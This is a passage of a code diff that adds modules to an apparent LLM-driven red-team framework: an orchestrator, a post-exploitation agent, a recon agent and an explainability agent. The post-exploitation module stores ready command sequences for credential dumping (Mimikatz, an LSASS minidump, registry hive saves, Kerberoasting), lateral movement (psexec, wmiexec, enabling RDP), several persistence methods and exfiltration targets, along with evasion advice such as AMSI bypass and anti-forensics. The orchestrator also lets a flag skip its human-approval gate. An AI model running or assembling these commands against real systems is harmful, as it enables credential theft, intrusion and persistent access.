cloud services as C2 infrastructure" + ] + elif agent_type == "post_exploit": + alternatives = [ + "Use living-off-the-land techniques instead of custom tools", + "Implement time delays between actions to avoid pattern detection", + "Utilize legitimate administrative tools for post-exploitation activities" + ] + + return alternatives + + def _suggest_mitigations(self, agent_type: str, decision_data: Dict[str, Any]) -> List[str]: + """Suggest risk mitigation strategies""" + mitigations = [ + "Monitor network traffic for anomalous patterns", + "Implement rate limiting to slow down automated attacks", + "Deploy behavioral analysis tools to detect suspicious activities", + "Maintain updated incident response procedures" + ] + + return mitigations + + def _calculate_confidence(self, decision_data: Dict[str, Any]) -> float: + """Calculate confidence score for the decision""" + # Simple confidence calculation based on available data + factors = [] + + if decision_data.get("target"): + factors.append(0.2) + if decision_data.get("action"): + factors.append(0.3) + if decision_data.get("parameters"): + factors.append(0.2) + if decision_data.get("context"): + factors.append(0.3) + + return min(sum(factors), 1.0) + + def format_explanation(self, explanation: Dict[str, Any], format_type: str = "json") -> str: + """Format explanation in the specified format""" + if format_type == "json": + return json.dumps(explanation, indent=2) + elif format_type == "yaml": + return yaml.dump(explanation, default_flow_style=False) + elif format_type == "markdown": + return self._format_as_markdown(explanation) + else: + return str(explanation) + + def _format_as_markdown(self, explanation: Dict[str, Any]) -> str: + """Format explanation as markdown""" + md = f""" +# Decision Explanation Report + +**Agent Type**: {explanation.get('agent_type', 'Unknown')} +**Decision ID**: {explanation.get('decision_id', 'Unknown')} +**Timestamp**: {explanation.get('timestamp', 'Unknown')} +**Confidence Score**: {explanation.get('confidence_score', 0.0):.2f} + +## Explanation +{explanation.get('explanation', 'No explanation available')} + +## Risk Assessment +""" + + risks = explanation.get('risk_assessment', {}) + for risk, level in risks.items(): + md += f"- **{risk.replace('_', ' ').title()}**: {level}\n" + + if explanation.get('alternatives'): + md += "\n## Alternative Approaches\n" + for alt in explanation['alternatives']: + md += f"- {alt}\n" + + if explanation.get('mitigations'): + md += "\n## Suggested Mitigations\n" + for mit in explanation['mitigations']: + md += f"- {mit}\n" + + return md + +# Example usage and testing +if __name__ == "__main__": + # Initialize the explainability agent + explainer = ExplainabilityAgent() + + # Example recon decision + recon_decision = { + "id": "recon_001", + "action": "nmap_scan", + "target": "192.168.1.1-100", + "parameters": { + "scan_type": "TCP SYN", + "ports": "1-1000", + "timing": "T3" + }, + "context": "Initial network reconnaissance" + } + + # Generate explanation + explanation = explainer.explain_decision("recon", recon_decision) + + # Format and display + print("JSON Format:") + print(explainer.format_explanation(explanation, "json")) + + print("\nMarkdown Format:") + print(explainer.format_explanation(explanation, "markdown")) diff --git a/src/agents/orchestrator.py b/src/agents/orchestrator.py new file mode 100644 index 0000000000000000000000000000000000000000..0c67ccb6028c1723f939763fd643847b5da17004 --- /dev/null +++ b/src/agents/orchestrator.py @@ -0,0 +1,518 @@ +""" +Cyber-LLM Agent Orchestrator + +Main orchestration engine for coordinating multi-agent red team operations. +Manages workflow execution, safety checks, and human-in-the-loop approvals. + +Author: Muzan Sano +Email: sanosensei36@gmail.com +""" + +import json +import logging +import asyncio +import yaml +from typing import Dict, List, Any, Optional, Type +from dataclasses import dataclass +from datetime import datetime +from pathlib import Path + +# Import agents +from .recon_agent import ReconAgent, ReconRequest +from .c2_agent import C2Agent, C2Request +from .post_exploit_agent import PostExploitAgent, PostExploitRequest +from .safety_agent import SafetyAgent, SafetyRequest +from .explainability_agent import ExplainabilityAgent, ExplainabilityRequest + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +@dataclass +class OperationContext: + """Context for red team operation.""" + operation_id: str + target: str + objectives: List[str] + constraints: Dict[str, Any] + approval_required: bool = True + stealth_mode: bool = True + max_duration: int = 14400 # 4 hours + +@dataclass +class AgentResult: + """Result from agent execution.""" + agent_name: str + success: bool + data: Dict[str, Any] + execution_time: float + risk_score: float + errors: List[str] = None + +class RedTeamOrchestrator: + """ + Advanced orchestrator for coordinating multi-agent red team operations. + Implements safety checks, human approval workflows, and operational security. + """ + + def __init__(self, config_path: Optional[str] = None): + self.config = self._load_config(config_path) + self.agents = self._initialize_agents() + self.workflows = self._load_workflows() + self.operation_history = [] + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load orchestrator configuration.""" + if config_path: + with open(config_path, 'r') as f: + return yaml.safe_load(f) + return { + "max_parallel_agents": 3, + "safety_threshold": 0.7, + "require_human_approval": True, + "log_all_operations": True, + "auto_cleanup": True + } + + def _initialize_agents(self) -> Dict[str, Any]: + """Initialize all available agents.""" + return { + "recon": ReconAgent(), + "c2": C2Agent(), + "post_exploit": PostExploitAgent(), + "safety": SafetyAgent(), + "explainability": ExplainabilityAgent() + } + + def _load_workflows(self) -> Dict[str, Any]: + """Load predefined workflow templates.""" + return { + "standard_red_team": { + "name": "Standard Red Team Assessment", + "description": "Full red team engagement workflow", + "phases": [ + { + "name": "reconnaissance", + "agents": ["recon"], + "parallel": False, + "safety_check": True, + "human_approval": True + }, + { + "name": "initial_access", + "agents": ["c2"], + "parallel": False, + "safety_check": True, + "human_approval": True, + "depends_on": ["reconnaissance"] + }, + { + "name": "post_exploitation", + "agents": ["post_exploit"], + "parallel": False, + "safety_check": True, + "human_approval": True, + "depends_on": ["initial_access"] + } + ] + }, + "stealth_assessment": { + "name": "Stealth Red Team Assessment", + "description": "Low-detection red team workflow", + "phases": [ + { + "name": "passive_recon", + "agents": ["recon"], + "parallel": False, + "safety_check": True, + "human_approval": False, + "config_overrides": {"scan_type": "passive"} + }, + { + "name": "targeted_exploitation", + "agents": ["c2", "post_exploit"], + "parallel": True, + "safety_check": True, + "human_approval": True, + "depends_on": ["passive_recon"] + } + ] + }, + "credential_focused": { + "name": "Credential Harvesting Focus", + "description": "Credential-focused assessment workflow", + "phases": [ + { + "name": "initial_recon", + "agents": ["recon"], + "parallel": False, + "safety_check": True, + "human_approval": False + }, + { + "name": "credential_harvest", + "agents": ["post_exploit"], + "parallel": False, + "safety_check": True, + "human_approval": True, + "config_overrides": {"objectives": ["credential_harvest"]}, + "depends_on": ["initial_recon"] + } + ] + } + } + + async def safety_check(self, agent_name: str, planned_actions: Dict[str, Any]) -> Dict[str, Any]: + """ + Perform safety and OPSEC compliance check. + + # HUMAN_APPROVAL_REQUIRED: Safety checks require human oversight + """ + logger.info(f"Performing safety check for {agent_name}") + + safety_agent = self.agents["safety"] + safety_result = await safety_agent.evaluate_actions(planned_actions) + + # Check against safety threshold + if safety_result["risk_score"] > self.config["safety_threshold"]: + logger.warning(f"High risk detected for {agent_name}: {safety_result['risk_score']}") + safety_result["approved"] = False + safety_result["reason"] = "Risk score exceeds safety threshold" + else: + safety_result["approved"] = True + + return safety_result + + async def request_human_approval(self, agent_name: str, planned_actions: Dict[str, Any], + safety_result: Dict[str, Any]) -> bool: + """ + Request human approval for high-risk operations. + + # HUMAN_APPROVAL_REQUIRED: This function handles human approval workflow + """ + print(f"\n{'='*60}") + print(f"HUMAN APPROVAL REQUIRED - {agent_name.upper()}") + print(f"{'='*60}") + + print(f"Risk Score: {safety_result.get('risk_score', 'Unknown')}") + print(f"Risk Level: {safety_result.get('risk_level', 'Unknown')}") + + if safety_result.get('risks'): + print("\nIdentified Risks:") + for risk in safety_result['risks']: + print(f" - {risk}") + + if safety_result.get('mitigations'): + print("\nRecommended Mitigations:") + for mitigation in safety_result['mitigations']: + print(f" - {mitigation}") + + print(f"\nPlanned Actions Summary:") + print(json.dumps(planned_actions, indent=2)) + + print(f"\n{'='*60}") + + # In a real implementation, this would integrate with a proper approval system + while True: + response = input("Approve this operation? [y/N/details]: ").lower().strip() + + if response in ['y', 'yes']: + logger.info(f"Human approval granted for {agent_name}") + return True + elif response in ['n', 'no', '']: + logger.info(f"Human approval denied for {agent_name}") + return False + elif response == 'details': + print("\nDetailed Action Plan:") + print(json.dumps(planned_actions, indent=2)) + else: + print("Please enter 'y' for yes, 'n' for no, or 'details' for more information") + + async def execute_agent(self, agent_name: str, context: OperationContext, + config_overrides: Optional[Dict[str, Any]] = None) -> AgentResult: + """Execute a single agent with safety checks and approval workflow.""" + start_time = datetime.now() + + try: + agent = self.agents[agent_name] + + # Create agent-specific request + if agent_name == "recon": + request = ReconRequest( + target=context.target, + scan_type=config_overrides.get("scan_type", "stealth") if config_overrides else "stealth", + stealth_mode=context.stealth_mode + ) + planned_actions = { + "agent": agent_name, + "target": context.target, + "scan_type": request.scan_type + } + + elif agent_name == "c2": + request = C2Request( + payload_type="powershell", + target_environment="corporate", # Could be derived from recon + network_constraints=context.constraints.get("network", {}), + stealth_level="high" if context.stealth_mode else "medium" + ) + planned_actions = { + "agent": agent_name, + "payload_type": request.payload_type, + "stealth_level": request.stealth_level + } + + elif agent_name == "post_exploit": + request = PostExploitRequest( + target_system=context.target, + access_level="user", # Could be updated based on previous results + objectives=config_overrides.get("objectives", context.objectives) if config_overrides else context.objectives, + constraints=context.constraints, + stealth_mode=context.stealth_mode + ) + planned_actions = { + "agent": agent_name, + "target": context.target, + "objectives": request.objectives + } + + else: + raise ValueError(f"Unknown agent: {agent_name}") + + # Safety check + if context.approval_required: + safety_result = await self.safety_check(agent_name, planned_actions) + + if not safety_result["approved"]: + return AgentResult( + agent_name=agent_name, + success=False, + data={"error": "Failed safety check", "safety_result": safety_result}, + execution_time=0, + risk_score=safety_result.get("risk_score", 1.0), + errors=["Safety check failed"] + ) + + # Request human approval if required + if self.config["require_human_approval"]: + approved = await self.request_human_approval(agent_name, planned_actions, safety_result) + if not approved: + return AgentResult( + agent_name=agent_name, + success=False, + data={"error": "Human approval denied"}, + execution_time=0, + risk_score=safety_result.get("risk_score", 1.0), + errors=["Human approval denied"] + ) + + # Execute agent + logger.info(f"Executing {agent_name} agent") + + if agent_name == "recon": + result = agent.execute_reconnaissance(request) + elif agent_name == "c2": + result = agent.execute_c2_setup(request) + elif agent_name == "post_exploit": + result = agent.execute_post_exploitation(request) + + execution_time = (datetime.now() - start_time).total_seconds() + + # Extract risk score from result + risk_score = 0.0 + if hasattr(result, 'risk_assessment') and result.risk_assessment: + risk_score = result.risk_assessment.get('risk_score', 0.0) + + return AgentResult( + agent_name=agent_name, + success=True, + data=result.dict() if hasattr(result, 'dict') else result, + execution_time=execution_time, + risk_score=risk_score + ) + + except Exception as e: + execution_time = (datetime.now() - start_time).total_seconds() + logger.error(f"Error executing {agent_name}: {str(e)}") + + return AgentResult( + agent_name=agent_name, + success=False, + data={"error": str(e)}, + execution_time=execution_time, + risk_score=1.0, + errors=[str(e)] + ) + + async def execute_workflow(self, workflow_name: str, context: OperationContext) -> Dict[str, Any]: + """ + Execute a complete red team workflow. + + # HUMAN_APPROVAL_REQUIRED: Workflow execution requires oversight + """ + if workflow_name not in self.workflows: + raise ValueError(f"Unknown workflow: {workflow_name}") + + workflow = self.workflows[workflow_name] + logger.info(f"Starting workflow: {workflow['name']}") + + operation_start = datetime.now() + results = {} + phase_results = {} + + try: + for phase in workflow["phases"]: + phase_name = phase["name"] + logger.info(f"Executing phase: {phase_name}") + + # Check dependencies + if "depends_on" in phase: + for dependency in phase["depends_on"]: + if dependency not in phase_results or not phase_results[dependency]["success"]: + logger.error(f"Phase {phase_name} dependency {dependency} not satisfied") + phase_results[phase_name] = { + "success": False, + "error": f"Dependency {dependency} not satisfied" + } + continue + + # Execute agents in phase + if phase.get("parallel", False): + # Execute agents in parallel + tasks = [] + for agent_name in phase["agents"]: + config_overrides = phase.get("config_overrides") + task = self.execute_agent(agent_name, context, config_overrides) + tasks.append(task) + + agent_results = await asyncio.gather(*tasks) + else: + # Execute agents sequentially + agent_results = [] + for agent_name in phase["agents"]: + config_overrides = phase.get("config_overrides") + result = await self.execute_agent(agent_name, context, config_overrides) + agent_results.append(result) + + # Process phase results + phase_success = all(result.success for result in agent_results) + phase_results[phase_name] = { + "success": phase_success, + "agents": {result.agent_name: result for result in agent_results}, + "execution_time": sum(result.execution_time for result in agent_results), + "max_risk_score": max(result.risk_score for result in agent_results) if agent_results else 0.0 + } + + # Update context with results for next phase + for result in agent_results: + if result.success and result.agent_name == "recon": + # Update context with reconnaissance findings + if "nmap" in result.data: + context.constraints["discovered_services"] = result.data.get("nmap", []) + + logger.info(f"Phase {phase_name} completed: {'SUCCESS' if phase_success else 'FAILED'}") + + except Exception as e: + logger.error(f"Workflow execution failed: {str(e)}") + phase_results["error"] = str(e) + + # Generate final results + operation_time = (datetime.now() - operation_start).total_seconds() + overall_success = all(phase["success"] for phase in phase_results.values() if isinstance(phase, dict) and "success" in phase) + + results = { + "operation_id": context.operation_id, + "workflow": workflow_name, + "target": context.target, + "success": overall_success, + "execution_time": operation_time, + "phases": phase_results, + "timestamp": operation_start.isoformat(), + "context": { + "objectives": context.objectives, + "stealth_mode": context.stealth_mode, + "approval_required": context.approval_required + } + } + + # Store in operation history + self.operation_history.append(results) + + logger.info(f"Workflow {workflow_name} completed: {'SUCCESS' if overall_success else 'FAILED'}") + return results + + def generate_operation_report(self, operation_results: Dict[str, Any]) -> str: + """Generate comprehensive operation report.""" + explainability_agent = self.agents["explainability"] + return explainability_agent.generate_operation_report(operation_results) + + async def cleanup_operation(self, operation_id: str): + """Cleanup resources and artifacts from operation.""" + logger.info(f"Cleaning up operation: {operation_id}") + + # In a real implementation, this would: + # - Remove temporary files + # - Close network connections + # - Remove persistence mechanisms + # - Clear logs if required + + logger.info(f"Cleanup completed for operation: {operation_id}") + +def main(): + """CLI interface for Red Team Orchestrator.""" + import argparse + import uuid + + parser = argparse.ArgumentParser(description="Cyber-LLM Red Team Orchestrator") + parser.add_argument("--workflow", required=True, help="Workflow to execute") + parser.add_argument("--target", required=True, help="Target for assessment") + parser.add_argument("--objectives", nargs="+", default=["reconnaissance", "initial_access"], + help="Operation objectives") + parser.add_argument("--stealth", action="store_true", help="Enable stealth mode") + parser.add_argument("--no-approval", action="store_true", help="Skip human approval") + parser.add_argument("--config", help="Path to configuration file") + parser.add_argument("--output", help="Output file for results") + + args = parser.parse_args() + + async def run_operation(): + # Initialize orchestrator + orchestrator = RedTeamOrchestrator(config_path=args.config) + + # Create operation context + context = OperationContext( + operation_id=str(uuid.uuid4()), + target=args.target, + objectives=args.objectives, + constraints={}, + approval_required=not args.no_approval, + stealth_mode=args.stealth + ) + + # Execute workflow + results = await orchestrator.execute_workflow(args.workflow, context) + + # Generate report + report = orchestrator.generate_operation_report(results) + + # Output results + output_data = { + "results": results, + "report": report + } + + if args.output: + with open(args.output, 'w') as f: + json.dump(output_data, f, indent=2) + print(f"Operation results saved to {args.output}") + else: + print(json.dumps(output_data, indent=2)) + + # Cleanup + await orchestrator.cleanup_operation(context.operation_id) + + # Run the async operation + asyncio.run(run_operation()) + +if __name__ == "__main__": + main() diff --git a/src/agents/post_exploit_agent.py b/src/agents/post_exploit_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..9321f42dd0def0675b8c50c41724ce83f491e0fa --- /dev/null +++ b/src/agents/post_exploit_agent.py @@ -0,0 +1,506 @@ +""" +Cyber-LLM Post-Exploitation Agent + +Handles credential harvesting, lateral movement, and persistence operations. +Integrates with Mimikatz, BloodHound, and post-exploitation frameworks. + +Author: Muzan Sano +Email: sanosensei36@gmail.com +""" + +import json +import logging +import subprocess +from typing import Dict, List, Any, Optional +from dataclasses import dataclass +from pydantic import BaseModel +import yaml +from datetime import datetime + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +class PostExploitRequest(BaseModel): + target_system: str + access_level: str # "user", "admin", "system" + objectives: List[str] + constraints: Dict[str, Any] + stealth_mode: bool = True + +class PostExploitResponse(BaseModel): + credential_harvest: Dict[str, Any] + lateral_movement: Dict[str, Any] + persistence: Dict[str, Any] + exfiltration: Dict[str, Any] + command_sequence: List[str] + risk_assessment: Dict[str, Any] + +class PostExploitAgent: + """ + Advanced post-exploitation agent for credential harvesting, + lateral movement, and persistence establishment. + """ + + def __init__(self, config_path: Optional[str] = None): + self.config = self._load_config(config_path) + self.techniques = self._load_techniques() + self.persistence_methods = self._load_persistence_methods() + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load post-exploitation configuration.""" + if config_path: + with open(config_path, 'r') as f: + return yaml.safe_load(f) + return { + "max_execution_time": 3600, + "cleanup_on_exit": True, + "log_operations": True + } + + def _load_techniques(self) -> Dict[str, Any]: + """Load post-exploitation techniques database.""" + return { + "credential_harvest": { + "mimikatz": { + "technique": "T1003.001", + "commands": [ + "privilege::debug", + "sekurlsa::logonpasswords", + "sekurlsa::wdigest", + "sekurlsa::kerberos", + "sekurlsa::tspkg" + ], + "detection_risk": "high", + "requirements": ["admin_rights", "debug_privilege"] + }, + "lsass_dump": { + "technique": "T1003.001", + "commands": [ + "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump [PID] C:\\temp\\lsass.dmp full", + "reg save HKLM\\sam C:\\temp\\sam.hive", + "reg save HKLM\\security C:\\temp\\security.hive", + "reg save HKLM\\system C:\\temp\\system.hive" + ], + "detection_risk": "medium", + "requirements": ["admin_rights"] + }, + "kerberoasting": { + "technique": "T1558.003", + "commands": [ + "powershell -ep bypass", + "Import-Module .\\PowerView.ps1", + "Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat", + "Invoke-Kerberoast -OutputFormat HashCat" + ], + "detection_risk": "low", + "requirements": ["domain_user"] + } + }, + "lateral_movement": { + "psexec": { + "technique": "T1021.002", + "command_template": "psexec.exe \\\\{target} -u {domain}\\{user} -p {password} cmd.exe", + "detection_risk": "high", + "requirements": ["admin_creds", "smb_access"] + }, + "wmiexec": { + "technique": "T1047", + "command_template": "wmiexec.py {domain}/{user}:{password}@{target}", + "detection_risk": "medium", + "requirements": ["admin_creds", "wmi_access"] + }, + "rdp": { + "technique": "T1021.001", + "commands": [ + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f", + "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes" + ], + "detection_risk": "medium", + "requirements": ["admin_rights"] + } + }, + "privilege_escalation": { + "uac_bypass": { + "technique": "T1548.002", + "methods": ["fodhelper", "computerdefaults", "sdclt"], + "detection_risk": "low" + }, + "token_impersonation": { + "technique": "T1134", + "commands": [ + "list tokens", + "impersonate_token {token}", + "getuid" + ], + "detection_risk": "medium" + } + } + } + + def _load_persistence_methods(self) -> Dict[str, Any]: + """Load persistence techniques.""" + return { + "registry_run_keys": { + "technique": "T1547.001", + "commands": [ + "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}", + "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}" + ], + "detection_risk": "medium", + "cleanup": "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /f" + }, + "scheduled_task": { + "technique": "T1053.005", + "commands": [ + "schtasks /create /tn {task_name} /tr {payload_path} /sc onlogon /ru system", + "schtasks /run /tn {task_name}" + ], + "detection_risk": "low", + "cleanup": "schtasks /delete /tn {task_name} /f" + }, + "service_creation": { + "technique": "T1543.003", + "commands": [ + "sc create {service_name} binpath= {payload_path} start= auto", + "sc start {service_name}" + ], + "detection_risk": "high", + "cleanup": "sc delete {service_name}" + }, + "wmi_event": { + "technique": "T1546.003", + "commands": [ + "powershell -c \"Register-WmiEvent -Query \\\"SELECT * FROM Win32_LogonSession\\\" -Action { Start-Process {payload_path} }\"" + ], + "detection_risk": "low", + "cleanup": "powershell -c \"Get-WmiEvent | Unregister-Event\"" + } + } + + def analyze_bloodhound_data(self, bloodhound_json: Optional[str] = None) -> Dict[str, Any]: + """ + Analyze BloodHound data for lateral movement opportunities. + + # HUMAN_APPROVAL_REQUIRED: Review lateral movement paths before execution + """ + # Simulated BloodHound analysis (in practice, would parse actual data) + analysis = { + "high_value_targets": [ + {"name": "DC01.domain.local", "type": "Domain Controller", "priority": 1}, + {"name": "SQL01.domain.local", "type": "Database Server", "priority": 2}, + {"name": "FILE01.domain.local", "type": "File Server", "priority": 3} + ], + "attack_paths": [ + { + "path": "Current User -> Domain Admins", + "steps": [ + "Kerberoast service accounts", + "Crack obtained hashes", + "Move to SQL01 with service account", + "Escalate via SQLi to SYSTEM", + "Extract cached domain admin credentials" + ], + "difficulty": "medium", + "detection_risk": "medium" + } + ], + "vulnerable_accounts": [ + {"name": "svc-sql", "type": "Service Account", "spn": True, "admin": False}, + {"name": "backup-svc", "type": "Service Account", "spn": True, "admin": True} + ], + "group_memberships": { + "domain_admins": ["administrator", "da-backup"], + "server_operators": ["svc-backup", "svc-sql"], + "account_operators": ["helpdesk1", "helpdesk2"] + } + } + + return analysis + + def plan_credential_harvest(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]: + """Plan credential harvesting operations based on access level.""" + harvest_plan = { + "primary_techniques": [], + "secondary_techniques": [], + "stealth_considerations": [], + "detection_risks": [] + } + + if access_level in ["admin", "system"]: + # High privilege techniques + if stealth_mode: + harvest_plan["primary_techniques"].extend([ + self.techniques["credential_harvest"]["lsass_dump"], + self.techniques["credential_harvest"]["kerberoasting"] + ]) + harvest_plan["stealth_considerations"].extend([ + "Use process hollowing to avoid direct Mimikatz execution", + "Implement AMSI bypass techniques", + "Use legitimate admin tools where possible" + ]) + else: + harvest_plan["primary_techniques"].append( + self.techniques["credential_harvest"]["mimikatz"] + ) + + else: + # User-level techniques + harvest_plan["primary_techniques"].append( + self.techniques["credential_harvest"]["kerberoasting"] + ) + harvest_plan["secondary_techniques"].extend([ + { + "technique": "Browser Credential Extraction", + "commands": ["powershell -c \"Get-ChromePasswords\""], + "detection_risk": "low" + }, + { + "technique": "WiFi Password Extraction", + "commands": ["netsh wlan show profiles", "netsh wlan show profile {profile} key=clear"], + "detection_risk": "very_low" + } + ]) + + return harvest_plan + + def plan_lateral_movement(self, bloodhound_analysis: Dict[str, Any], credentials: List[Dict[str, Any]]) -> Dict[str, Any]: + """Plan lateral movement strategy based on BloodHound analysis and available credentials.""" + + movement_plan = { + "target_systems": [], + "movement_techniques": [], + "escalation_path": [], + "operational_notes": [] + } + + # Prioritize targets + for target in bloodhound_analysis["high_value_targets"]: + movement_plan["target_systems"].append({ + "hostname": target["name"], + "priority": target["priority"], + "access_methods": ["wmiexec", "psexec", "rdp"], + "required_creds": "admin" + }) + + # Select movement techniques based on available credentials + if any(cred.get("admin", False) for cred in credentials): + movement_plan["movement_techniques"].extend([ + self.techniques["lateral_movement"]["wmiexec"], + self.techniques["lateral_movement"]["psexec"] + ]) + else: + movement_plan["movement_techniques"].append({ + "technique": "T1021.004", + "name": "SSH Lateral Movement", + "command_template": "ssh {user}@{target}", + "detection_risk": "low" + }) + + # Plan escalation path + for path in bloodhound_analysis["attack_paths"]: + movement_plan["escalation_path"].append({ + "path_name": path["path"], + "steps": path["steps"], + "estimated_time": "2-4 hours", + "required_tools": ["PowerView", "Invoke-Kerberoast", "Hashcat"] + }) + + return movement_plan + + def plan_persistence(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]: + """Plan persistence mechanisms based on access level and stealth requirements.""" + + persistence_plan = { + "primary_methods": [], + "backup_methods": [], + "cleanup_commands": [], + "monitoring_evasion": [] + } + + if access_level in ["admin", "system"]: + if stealth_mode: + # Stealthy high-privilege persistence + persistence_plan["primary_methods"].extend([ + self.persistence_methods["wmi_event"], + self.persistence_methods["scheduled_task"] + ]) + else: + # Standard high-privilege persistence + persistence_plan["primary_methods"].extend([ + self.persistence_methods["service_creation"], + self.persistence_methods["registry_run_keys"] + ]) + else: + # User-level persistence + persistence_plan["primary_methods"].append( + self.persistence_methods["registry_run_keys"] + ) + + # Add cleanup commands + for method in persistence_plan["primary_methods"]: + if "cleanup" in method: + persistence_plan["cleanup_commands"].append(method["cleanup"]) + + return persistence_plan + + def assess_detection_risk(self, operations: List[Dict[str, Any]]) -> Dict[str, Any]: + """Assess overall detection risk of planned operations.""" + + risk_levels = {"very_low": 1, "low": 2, "medium": 3, "high": 4, "very_high": 5} + total_risk = 0 + operation_count = 0 + + high_risk_operations = [] + + for operation in operations: + if "detection_risk" in operation: + risk_score = risk_levels.get(operation["detection_risk"], 3) + total_risk += risk_score + operation_count += 1 + + if risk_score >= 4: + high_risk_operations.append(operation.get("name", "Unknown Operation")) + + average_risk = total_risk / max(operation_count, 1) + + risk_assessment = { + "overall_risk_score": average_risk, + "risk_level": "HIGH" if average_risk >= 3.5 else "MEDIUM" if average_risk >= 2.5 else "LOW", + "high_risk_operations": high_risk_operations, + "recommendations": [] + } + + if average_risk >= 3.5: + risk_assessment["recommendations"].extend([ + "Consider using living-off-the-land techniques", + "Implement anti-forensics measures", + "Use process hollowing and injection techniques", + "Rotate tools and techniques frequently" + ]) + + return risk_assessment + + def execute_post_exploitation(self, request: PostExploitRequest) -> PostExploitResponse: + """ + Execute complete post-exploitation workflow. + + # HUMAN_APPROVAL_REQUIRED: Review post-exploitation plan before execution + """ + logger.info(f"Starting post-exploitation on {request.target_system}") + + # Analyze BloodHound data + bloodhound_analysis = self.analyze_bloodhound_data() + + # Plan operations + credential_harvest = self.plan_credential_harvest(request.access_level, request.stealth_mode) + + # Simulate credentials (in practice, would come from harvest) + mock_credentials = [ + {"username": "svc-sql", "password": "Service123!", "domain": "domain.local", "admin": False}, + {"username": "backup-svc", "password": "Backup456!", "domain": "domain.local", "admin": True} + ] + + lateral_movement = self.plan_lateral_movement(bloodhound_analysis, mock_credentials) + persistence = self.plan_persistence(request.access_level, request.stealth_mode) + + # Generate command sequence + command_sequence = [] + + # Credential harvest commands + for technique in credential_harvest["primary_techniques"]: + command_sequence.extend(technique.get("commands", [])) + + # Lateral movement commands + for technique in lateral_movement["movement_techniques"]: + if "command_template" in technique: + command_sequence.append(f"# {technique.get('name', 'Lateral Movement')}") + command_sequence.append(technique["command_template"]) + + # Persistence commands + for method in persistence["primary_methods"]: + command_sequence.extend(method.get("commands", [])) + + # Risk assessment + all_operations = (credential_harvest["primary_techniques"] + + lateral_movement["movement_techniques"] + + persistence["primary_methods"]) + risk_assessment = self.assess_detection_risk(all_operations) + + # Exfiltration planning + exfiltration = { + "methods": ["DNS tunneling", "HTTPS upload", "Email exfiltration"], + "targets": [ + "C:\\Users\\*\\Documents\\*.doc*", + "C:\\Users\\*\\Desktop\\*.pdf", + "Registry hives", + "Browser saved passwords" + ], + "staging_location": "C:\\Windows\\Temp\\update.log", + "encryption": "AES-256", + "compression": True + } + + response = PostExploitResponse( + credential_harvest=credential_harvest, + lateral_movement=lateral_movement, + persistence=persistence, + exfiltration=exfiltration, + command_sequence=command_sequence, + risk_assessment=risk_assessment + ) + + logger.info(f"Post-exploitation plan complete for {request.target_system}") + return response + +def main(): + """CLI interface for PostExploitAgent.""" + import argparse + + parser = argparse.ArgumentParser(description="Cyber-LLM Post-Exploitation Agent") + parser.add_argument("--target", required=True, help="Target system identifier") + parser.add_argument("--access-level", choices=["user", "admin", "system"], + default="user", help="Current access level") + parser.add_argument("--objectives", nargs="+", default=["credential_harvest", "lateral_movement"], + help="Post-exploitation objectives") + parser.add_argument("--stealth", action="store_true", help="Enable stealth mode") + parser.add_argument("--config", help="Path to configuration file") + parser.add_argument("--output", help="Output file for results") + + args = parser.parse_args() + + # Initialize agent + agent = PostExploitAgent(config_path=args.config) + + # Create request + request = PostExploitRequest( + target_system=args.target, + access_level=args.access_level, + objectives=args.objectives, + constraints={}, + stealth_mode=args.stealth + ) + + # Execute post-exploitation + response = agent.execute_post_exploitation(request) + + # Output results + result = { + "target": args.target, + "credential_harvest": response.credential_harvest, + "lateral_movement": response.lateral_movement, + "persistence": response.persistence, + "exfiltration": response.exfiltration, + "command_sequence": response.command_sequence, + "risk_assessment": response.risk_assessment + } + + if args.output: + with open(args.output, 'w') as f: + json.dump(result, f, indent=2) + print(f"Post-exploitation plan saved to {args.output}") + else: + print(json.dumps(result, indent=2)) + +if __name__ == "__main__": + main() diff --git a/src/agents/recon_agent.py b/src/agents/recon_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..8a3c7b09c96b21f79b3c423702baf8a8d904bb84 --- /dev/null +++ b/src/agents/recon_agent.py @@ -0,0 +1,353 @@ +""" +ReconAgent: Cybersecurity Reconnaissance Agent +Performs stealth reconnaissance and information gathering operations. +""" + +import json +import logging +from typing import Dict, List, Optional, Any +from dataclasses import dataclass +from pathlib import Path + +# HUMAN_APPROVAL_REQUIRED: Review reconnaissance strategies before execution + +@dataclass +class ReconTarget: + """Target information for reconnaissance operations.""" + target: str + target_type: str # 'domain', 'ip', 'network', 'organization' + constraints: Dict[str, Any] + opsec_level: str = 'medium' # 'low', 'medium', 'high', 'maximum' + +@dataclass +class ReconResult: + """Results from reconnaissance operations.""" + target: str + commands: Dict[str, List[str]] + passive_techniques: List[str] + opsec_notes: List[str] + risk_assessment: str + next_steps: List[str] + +class ReconAgent: + """Advanced reconnaissance agent with OPSEC awareness.""" + + def __init__(self, config_path: Optional[Path] = None): + self.logger = logging.getLogger(__name__) + self.config = self._load_config(config_path) + self.opsec_profiles = self._load_opsec_profiles() + + def _load_config(self, config_path: Optional[Path]) -> Dict: + """Load agent configuration.""" + default_config = { + 'max_scan_ports': 1000, + 'scan_timing': 'T3', # Normal timing + 'stealth_mode': True, + 'passive_only': False, + 'shodan_api_key': None, + 'censys_api_key': None + } + + if config_path and config_path.exists(): + with open(config_path, 'r') as f: + user_config = json.load(f) + default_config.update(user_config) + + return default_config + + def _load_opsec_profiles(self) -> Dict: + """Load OPSEC profiles for different stealth levels.""" + return { + 'low': { + 'timing': 'T4', + 'port_limit': 65535, + 'techniques': ['tcp_connect', 'udp_scan', 'service_detection'], + 'delay_between_scans': 0 + }, + 